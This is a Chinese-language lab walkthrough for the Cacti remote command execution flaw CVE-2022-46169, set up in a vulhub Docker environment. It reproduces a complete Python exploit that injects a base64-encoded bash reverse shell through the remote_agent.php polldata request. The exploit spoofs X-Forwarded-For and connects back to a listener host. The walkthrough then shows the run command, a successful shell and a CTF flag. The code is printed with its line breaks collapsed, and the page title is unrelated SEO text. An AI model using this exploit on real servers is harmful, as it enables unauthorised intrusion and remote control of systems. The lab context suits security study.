南京科技网站设计费用_石家庄营销型网站制作_百度爱采购官方网站_网站推广步骤

环境部署

#git clone很慢，使用浏览器下载压缩包vulhub-master.zip
https://github.com/vulhub/vulhub#上传vulhub-master.zip到vps
rz -E#解压
unzip vulhub-master.zip -d ./#靶场环境部署
cd vulhub-master/cacti/CVE-2022-46169
docker-compose up -d#查看容器信息
docker ps#通过容器信息得到如下规则，访问宿主机的8080即可
0.0.0.0:8080->80/tcp, :::8080->80/tcp

访问http://172.25.254.139:8080

默认账户密码admin/admin

然后点开始

下一页

下一页

下一页

下一页

打勾，下一页

默认下一页

下一页

下一页

打勾，安装

安装中

开始使用

再利用此漏洞之前，添加新的“graphs”,因为此漏洞需要POLLER_ACTION_SCRIPT_PHP的采集器

选择的Graph Type是“Device - Uptime”，点击创建

建立nc监听

运行脚本

# https://www.exploit-db.com/exploits/51166
# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
# Exploit Author: Riadh BOUCHAHOUA
# Discovery Date: 2022-12-08
# Vendor Homepage: https://www.cacti.net/
# Software Links : https://github.com/Cacti/cacti
# Tested Version: 1.2.2x <= 1.2.22
# CVE: CVE-2022-46169
# Tested on OS: Debian 10/11# !/usr/bin/env python3
import random
import sysimport httpx, urllibclass Exploit:def __init__(self, url, proxy=None, rs_host="", rs_port=""):self.url = urlself.session = httpx.Client(headers={"User-Agent": self.random_user_agent()}, verify=False)self.rs_host = rs_hostself.rs_port = rs_portdef exploit(self):# cacti local ip from the url for the X-Forwarded-For header# local_cacti_ip  = self.url.split("//")[1].split("/")[0]local_cacti_ip = '127.0.0.1'headers = {'X-Forwarded-For': f'{local_cacti_ip}'}revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"import base64b64_revshell = base64.b64encode(revshell.encode()).decode()payload = f";echo {b64_revshell} | base64 -d | bash -"payload = urllib.parse.quote(payload)urls = []# Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)for host_id in range(1, 100):for local_data_ids in range(1, 100):urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")for url in urls:try:print("[*]try: {}".format(urllib.parse.unquote(url)))r = self.session.get(url, headers=headers)print(f"{r.status_code} - {r.text}")except Exception as e:print(e)sys.exit()passdef random_user_agent(self):ua_list = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36","Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",]return random.choice(ua_list)def parse_args():import argparseargparser = argparse.ArgumentParser()argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)return argparser.parse_args()def main() -> None:# Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URLargs = parse_args()e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)e.exploit()if __name__ == "__main__":main()

python CVE-2022-46169.py -u http://172.25.254.139:8080 -i 172.25.254.132 -p 5555

成功反弹shell

flag

flag{566c99f4df83cde0677f4639641b9c01}